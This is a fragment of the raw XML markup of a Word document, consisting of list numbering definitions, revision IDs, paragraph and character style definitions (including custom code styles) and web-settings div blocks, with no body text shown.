    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="438793225">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1780099279">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1088311556">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="1185024522">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="1440445244">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="73943207">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="1349680116">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="116740688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16"/>
    <w:rsid w:val="0001593C"/>
    <w:rsid w:val="0002127A"/>
    <w:rsid w:val="00050A80"/>
    <w:rsid w:val="000607D5"/>
    <w:rsid w:val="00063BAD"/>
    <w:rsid w:val="00065C4A"/>
    <w:rsid w:val="0007274E"/>
    <w:rsid w:val="00073711"/>
    <w:rsid w:val="0008601C"/>
    <w:rsid w:val="00096D6E"/>
    <w:rsid w:val="00097958"/>
    <w:rsid w:val="000A1D50"/>
    <w:rsid w:val="000B55A0"/>
    <w:rsid w:val="000C3A2B"/>
    <w:rsid w:val="000D0BDC"/>
    <w:rsid w:val="000E0843"/>
    <w:rsid w:val="000F36A1"/>
    <w:rsid w:val="000F5C66"/>
    <w:rsid w:val="00103854"/>
    <w:rsid w:val="00111C46"/>
    <w:rsid w:val="001218AC"/>
    <w:rsid w:val="00125E27"/>
    <w:rsid w:val="001266E4"/>
    <w:rsid w:val="00144112"/>
    <w:rsid w:val="001551D7"/>
    <w:rsid w:val="00157A76"/>
    <w:rsid w:val="00160C4F"/>
    <w:rsid w:val="0016263D"/>
    <w:rsid w:val="00166925"/>
    <w:rsid w:val="001702B2"/>
    <w:rsid w:val="00170391"/>
    <w:rsid w:val="00192DDB"/>
    <w:rsid w:val="00193527"/>
    <w:rsid w:val="001B71E8"/>
    <w:rsid w:val="001C5486"/>
    <w:rsid w:val="001C775E"/>
    <w:rsid w:val="00200907"/>
    <w:rsid w:val="00203EBE"/>
    <w:rsid w:val="00230C99"/>
    <w:rsid w:val="00230D3E"/>
    <w:rsid w:val="002420A0"/>
    <w:rsid w:val="00244110"/>
    <w:rsid w:val="00250E0A"/>
    <w:rsid w:val="00262416"/>
    <w:rsid w:val="00266632"/>
    <w:rsid w:val="0026762E"/>
    <w:rsid w:val="00281D45"/>
    <w:rsid w:val="002960F3"/>
    <w:rsid w:val="002A3D65"/>
    <w:rsid w:val="002B3DE6"/>
    <w:rsid w:val="002B67FF"/>
    <w:rsid w:val="002C6748"/>
    <w:rsid w:val="002D3CFF"/>
    <w:rsid w:val="00312025"/>
    <w:rsid w:val="003231A9"/>
    <w:rsid w:val="00326594"/>
    <w:rsid w:val="00336D43"/>
    <w:rsid w:val="00340A32"/>
    <w:rsid w:val="00345590"/>
    <w:rsid w:val="00354158"/>
    <w:rsid w:val="00366400"/>
    <w:rsid w:val="00383250"/>
    <w:rsid w:val="00385468"/>
    <w:rsid w:val="003876FA"/>
    <w:rsid w:val="00392AB0"/>
    <w:rsid w:val="003B19B9"/>
    <w:rsid w:val="003B5EDE"/>
    <w:rsid w:val="003C2CC6"/>
    <w:rsid w:val="003E74CC"/>
    <w:rsid w:val="003F27A5"/>
    <w:rsid w:val="003F60C2"/>
    <w:rsid w:val="004051EB"/>
    <w:rsid w:val="00410D1B"/>
    <w:rsid w:val="004126A1"/>
    <w:rsid w:val="00412C7B"/>
    <w:rsid w:val="004134F9"/>
    <w:rsid w:val="00425E97"/>
    <w:rsid w:val="004345E3"/>
    <w:rsid w:val="00443C21"/>
    <w:rsid w:val="004571C3"/>
    <w:rsid w:val="004668D1"/>
    <w:rsid w:val="00466907"/>
    <w:rsid w:val="00470B53"/>
    <w:rsid w:val="004857C9"/>
    <w:rsid w:val="004A2315"/>
    <w:rsid w:val="004A4C54"/>
    <w:rsid w:val="004B0727"/>
    <w:rsid w:val="004C00EB"/>
    <w:rsid w:val="004C6B94"/>
    <w:rsid w:val="004D0DED"/>
    <w:rsid w:val="004D50DA"/>
    <w:rsid w:val="004E0874"/>
    <w:rsid w:val="004E2361"/>
    <w:rsid w:val="004E48BE"/>
    <w:rsid w:val="004F46C1"/>
    <w:rsid w:val="00513D0E"/>
    <w:rsid w:val="00516ECD"/>
    <w:rsid w:val="005171BA"/>
    <w:rsid w:val="00517209"/>
    <w:rsid w:val="00517FD1"/>
    <w:rsid w:val="00531CE1"/>
    <w:rsid w:val="0053601B"/>
    <w:rsid w:val="0055477E"/>
    <w:rsid w:val="00554C89"/>
    <w:rsid w:val="00560227"/>
    <w:rsid w:val="0056768F"/>
    <w:rsid w:val="00573669"/>
    <w:rsid w:val="00577522"/>
    <w:rsid w:val="005777C2"/>
    <w:rsid w:val="00587171"/>
    <w:rsid w:val="00590910"/>
    <w:rsid w:val="00592DBA"/>
    <w:rsid w:val="005969CF"/>
    <w:rsid w:val="005A525B"/>
    <w:rsid w:val="005B4D05"/>
    <w:rsid w:val="005D4590"/>
    <w:rsid w:val="00603AF3"/>
    <w:rsid w:val="00611434"/>
    <w:rsid w:val="0062182F"/>
    <w:rsid w:val="006336CF"/>
    <w:rsid w:val="00637BAC"/>
    <w:rsid w:val="00642989"/>
    <w:rsid w:val="00665076"/>
    <w:rsid w:val="00673F85"/>
    <w:rsid w:val="006819A9"/>
    <w:rsid w:val="006841C5"/>
    <w:rsid w:val="00684D0E"/>
    <w:rsid w:val="00687A8C"/>
    <w:rsid w:val="00697BC1"/>
    <w:rsid w:val="006B346C"/>
    <w:rsid w:val="006B3A84"/>
    <w:rsid w:val="006C0C7C"/>
    <w:rsid w:val="006C22B9"/>
    <w:rsid w:val="006C324A"/>
    <w:rsid w:val="006C483D"/>
    <w:rsid w:val="006C4848"/>
    <w:rsid w:val="006C7024"/>
    <w:rsid w:val="006F6EF3"/>
    <w:rsid w:val="00704185"/>
    <w:rsid w:val="007073CF"/>
    <w:rsid w:val="00710593"/>
    <w:rsid w:val="00710BF6"/>
    <w:rsid w:val="00714887"/>
    <w:rsid w:val="007154B2"/>
    <w:rsid w:val="007214B6"/>
    <w:rsid w:val="00725BEE"/>
    <w:rsid w:val="00727EC8"/>
    <w:rsid w:val="00736675"/>
    <w:rsid w:val="00740D80"/>
    <w:rsid w:val="00752C54"/>
    <w:rsid w:val="00760E84"/>
    <w:rsid w:val="007753A5"/>
    <w:rsid w:val="0077785A"/>
    <w:rsid w:val="00784B78"/>
    <w:rsid w:val="00786006"/>
    <w:rsid w:val="0079383F"/>
    <w:rsid w:val="007A3546"/>
    <w:rsid w:val="007B052F"/>
    <w:rsid w:val="007B4279"/>
    <w:rsid w:val="007C0596"/>
    <w:rsid w:val="007C5797"/>
    <w:rsid w:val="007C71E3"/>
    <w:rsid w:val="007D0C0B"/>
    <w:rsid w:val="007D35B6"/>
    <w:rsid w:val="007D3F26"/>
    <w:rsid w:val="007E1186"/>
    <w:rsid w:val="007E73DA"/>
    <w:rsid w:val="007F33BD"/>
    <w:rsid w:val="008007D0"/>
    <w:rsid w:val="00802467"/>
    <w:rsid w:val="00831FDE"/>
    <w:rsid w:val="00837A59"/>
    <w:rsid w:val="0084282A"/>
    <w:rsid w:val="00843D88"/>
    <w:rsid w:val="00867B29"/>
    <w:rsid w:val="00873238"/>
    <w:rsid w:val="008744FF"/>
    <w:rsid w:val="00875E03"/>
    <w:rsid w:val="00897DB5"/>
    <w:rsid w:val="008A439C"/>
    <w:rsid w:val="008A5D9A"/>
    <w:rsid w:val="008A652E"/>
    <w:rsid w:val="008B29CE"/>
    <w:rsid w:val="008C3500"/>
    <w:rsid w:val="008D6E64"/>
    <w:rsid w:val="008F3FFB"/>
    <w:rsid w:val="008F5721"/>
    <w:rsid w:val="009074DD"/>
    <w:rsid w:val="00913913"/>
    <w:rsid w:val="00915FC0"/>
    <w:rsid w:val="00931A5C"/>
    <w:rsid w:val="00931C22"/>
    <w:rsid w:val="00932D3C"/>
    <w:rsid w:val="00935278"/>
    <w:rsid w:val="00945156"/>
    <w:rsid w:val="00946C7F"/>
    <w:rsid w:val="00960054"/>
    <w:rsid w:val="009603ED"/>
    <w:rsid w:val="00965330"/>
    <w:rsid w:val="0097193F"/>
    <w:rsid w:val="00977452"/>
    <w:rsid w:val="00990322"/>
    <w:rsid w:val="009B5F48"/>
    <w:rsid w:val="009C098A"/>
    <w:rsid w:val="009D5966"/>
    <w:rsid w:val="009E08B8"/>
    <w:rsid w:val="009E1675"/>
    <w:rsid w:val="009E59BA"/>
    <w:rsid w:val="009F2DBB"/>
    <w:rsid w:val="009F5B29"/>
    <w:rsid w:val="00A00A47"/>
    <w:rsid w:val="00A0635B"/>
    <w:rsid w:val="00A06D4D"/>
    <w:rsid w:val="00A1052F"/>
    <w:rsid w:val="00A160A4"/>
    <w:rsid w:val="00A17262"/>
    <w:rsid w:val="00A20537"/>
    <w:rsid w:val="00A333BB"/>
    <w:rsid w:val="00A40C79"/>
    <w:rsid w:val="00A40D16"/>
    <w:rsid w:val="00A43ADA"/>
    <w:rsid w:val="00A54FE9"/>
    <w:rsid w:val="00A70AD4"/>
    <w:rsid w:val="00A7567E"/>
    <w:rsid w:val="00A778C2"/>
    <w:rsid w:val="00A936F6"/>
    <w:rsid w:val="00AA2A4B"/>
    <w:rsid w:val="00AA58DD"/>
    <w:rsid w:val="00AC1750"/>
    <w:rsid w:val="00AD1934"/>
    <w:rsid w:val="00AD55E9"/>
    <w:rsid w:val="00AE397D"/>
    <w:rsid w:val="00AE4CC9"/>
    <w:rsid w:val="00AE6D1A"/>
    <w:rsid w:val="00AF662D"/>
    <w:rsid w:val="00B070D4"/>
    <w:rsid w:val="00B0782B"/>
    <w:rsid w:val="00B17A5C"/>
    <w:rsid w:val="00B34114"/>
    <w:rsid w:val="00B429F0"/>
    <w:rsid w:val="00B45E29"/>
    <w:rsid w:val="00B52916"/>
    <w:rsid w:val="00B57E44"/>
    <w:rsid w:val="00B67FE7"/>
    <w:rsid w:val="00B827D0"/>
    <w:rsid w:val="00B83B38"/>
    <w:rsid w:val="00B9025E"/>
    <w:rsid w:val="00B971A0"/>
    <w:rsid w:val="00BA22AE"/>
    <w:rsid w:val="00BA7C96"/>
    <w:rsid w:val="00BB3C68"/>
    <w:rsid w:val="00BB3D86"/>
    <w:rsid w:val="00BC3036"/>
    <w:rsid w:val="00BD7B2B"/>
    <w:rsid w:val="00BE193D"/>
    <w:rsid w:val="00BF1F04"/>
    <w:rsid w:val="00BF7996"/>
    <w:rsid w:val="00C171E1"/>
    <w:rsid w:val="00C22554"/>
    <w:rsid w:val="00C23A48"/>
    <w:rsid w:val="00C307FB"/>
    <w:rsid w:val="00C30A0B"/>
    <w:rsid w:val="00C551EC"/>
    <w:rsid w:val="00C577AB"/>
    <w:rsid w:val="00C7701A"/>
    <w:rsid w:val="00C80C52"/>
    <w:rsid w:val="00CA0D55"/>
    <w:rsid w:val="00CA12E4"/>
    <w:rsid w:val="00CA2A98"/>
    <w:rsid w:val="00CA5B5C"/>
    <w:rsid w:val="00CB4A50"/>
    <w:rsid w:val="00CC4F13"/>
    <w:rsid w:val="00CC6F43"/>
    <w:rsid w:val="00CD30C3"/>
    <w:rsid w:val="00CF38C9"/>
    <w:rsid w:val="00CF6668"/>
    <w:rsid w:val="00D003E2"/>
    <w:rsid w:val="00D020AF"/>
    <w:rsid w:val="00D05087"/>
    <w:rsid w:val="00D11CCD"/>
    <w:rsid w:val="00D41030"/>
    <w:rsid w:val="00D55A98"/>
    <w:rsid w:val="00D667B9"/>
    <w:rsid w:val="00D668B6"/>
    <w:rsid w:val="00D8657C"/>
    <w:rsid w:val="00D9029C"/>
    <w:rsid w:val="00DB0C93"/>
    <w:rsid w:val="00DC359E"/>
    <w:rsid w:val="00DD594C"/>
    <w:rsid w:val="00DE5E6B"/>
    <w:rsid w:val="00DF1416"/>
    <w:rsid w:val="00DF6B70"/>
    <w:rsid w:val="00DF6DBA"/>
    <w:rsid w:val="00E15EBC"/>
    <w:rsid w:val="00E2556B"/>
    <w:rsid w:val="00E40B29"/>
    <w:rsid w:val="00E533E2"/>
    <w:rsid w:val="00E628E6"/>
    <w:rsid w:val="00E66F06"/>
    <w:rsid w:val="00E73EED"/>
    <w:rsid w:val="00E81A31"/>
    <w:rsid w:val="00E85D45"/>
    <w:rsid w:val="00E86C2B"/>
    <w:rsid w:val="00EA1A0B"/>
    <w:rsid w:val="00EA6BD2"/>
    <w:rsid w:val="00EC58D9"/>
    <w:rsid w:val="00ED6321"/>
    <w:rsid w:val="00EE4A0B"/>
    <w:rsid w:val="00EE6E64"/>
    <w:rsid w:val="00EE7425"/>
    <w:rsid w:val="00EF74EF"/>
    <w:rsid w:val="00F03ED7"/>
    <w:rsid w:val="00F35B53"/>
    <w:rsid w:val="00F40CC6"/>
    <w:rsid w:val="00F42D9E"/>
    <w:rsid w:val="00F46094"/>
    <w:rsid w:val="00F57265"/>
    <w:rsid w:val="00F61A2B"/>
    <w:rsid w:val="00F83C6D"/>
    <w:rsid w:val="00F84008"/>
    <w:rsid w:val="00F85500"/>
    <w:rsid w:val="00FA480B"/>
    <w:rsid w:val="00FA7944"/>
    <w:rsid w:val="00FB4CB9"/>
    <w:rsid w:val="00FC103B"/>
    <w:rsid w:val="00FC72AB"/>
    <w:rsid w:val="00FD65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4A5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{11D4F3E5-DB63-41DC-A56E-40068462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1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F1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F1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1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1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1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F1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F1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1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1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416"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00DF1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416"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00DF1416"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00DF1416"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00DF1416"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00DF1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1416"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00DF1416"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00786006"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F6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A2B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F6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A2B"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
    <w:name w:val="code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="codeChar"/>
    <w:qFormat/>
    <w:rsid w:val="00637BAC"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codeChar">
    <w:name w:val="code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="code"/>
    <w:rsid w:val="00637BAC"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB0C93"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB0C93"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code2">
    <w:name w:val="code2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="code2Char"/>
    <w:qFormat/>
    <w:rsid w:val="000B55A0"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code2Char">
    <w:name w:val="code2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="code2"/>
    <w:rsid w:val="000B55A0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="ADADAD" w:themeFill="background2" w:themeFillShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A54F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FE9"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00875E03"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="glossary-term">
    <w:name w:val="glossary-term"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008D6E64"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BE193D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00F03ED7"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB3D86"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00775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412">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2973753">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="5445963">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21055522">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="23986799">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="26178109">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="26227320">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="36468594">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="36785637">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="533660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7708">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="272368347">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="21305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726">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="65153905">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
